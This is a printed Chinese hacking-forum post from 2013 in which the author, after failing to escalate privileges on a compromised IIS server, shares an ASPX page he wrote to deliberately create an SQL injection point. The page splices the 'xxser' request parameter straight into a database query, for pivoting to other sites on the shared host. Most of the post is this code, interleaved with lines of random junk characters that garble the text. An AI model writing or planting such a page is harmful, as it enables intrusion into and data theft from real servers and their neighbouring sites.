中国网络渗透测试联盟
标题:
利用aspx构造注射来跨站
[打印本页]
作者:
admin
时间:
2013-3-20 21:32
标题:
利用aspx构造注射来跨站
昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
0 D) m6 R- ^9 H4 Y: f
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
! e1 ?0 B4 o* W) ?: n
代码量不多,自己写个拉倒了。烦死了。
. O. X- r& ~: W
7 L% ~9 b; ^1 Y* U. \ F6 N0 {
! L+ h; F- v+ x
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
( O( F& U$ q( j! {5 U( ^9 e. m
<html xmlns="http://www.w3.org/1999/xhtml">
9 @& u9 T) O0 _( O0 g, Z
<head runat="server">
7 b5 w5 e9 ~( H! P
<title>暗影aspx构造注射专用页面</title>
/ a7 g: [7 G* Y' N$ C& ?
</head>
3 b9 ], z) d' e2 l) D( U% R# I/ }
<body>
% x; m) X1 [* J0 x4 X6 K
<form id="form1" runat="server">
; i7 l/ O$ {+ P
<div>
2 U' y* l b; H4 l2 M8 n, P) b" E0 Y
<script language="c#" runat="server">
: s0 G( s6 x" k* K( T7 i5 C q( N
* u% b* o6 F2 D) f
void page_init(object sender, EventArgs e)
) l) p% @8 h& V+ S) N! G
{
& i" p5 N. l; f6 }# Y: ^" f( J, X
) _& R. B5 E: ~3 ]- n6 Q1 ]# z! H! {
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
" o# w2 w1 C2 J3 i& h$ P
* W- b5 h- ]* X& V
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
: o$ U5 |" |& o1 T0 H! t6 N9 h* c
conn.Open();
. h* O" p9 i" u7 O* A
" o5 ^! ?/ D5 M# y5 g
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
2 w: O( a$ v1 K: R. w$ H
# s' a+ e4 R; E8 }' r8 o
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
% h7 b+ V3 J4 U+ @/ p' E
int x = command.ExecuteNonQuery();
7 h/ o! E: C5 [/ }8 M3 ^
Response.Write(i+"\n");
$ q. R$ U- ]# Y: ~7 t$ N
Response.Write(x);
- n( @& ~( A/ Q. s2 l' V
conn.Close();
5 _" R# j9 {$ K' _0 p# `* z3 v
}
: n1 u2 M0 R5 s6 z4 I0 y
4 l" k/ |$ W8 N6 M& ^
</script>
: o% z5 v. u9 j0 [5 B: e
</div>
& \6 i3 [& z9 O
</form>
0 \6 {8 ]' |. X* t
</body>
& u9 R" h; p o2 @4 }2 y
</html>
w* U5 [ V) `$ ]/ M* y1 W
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2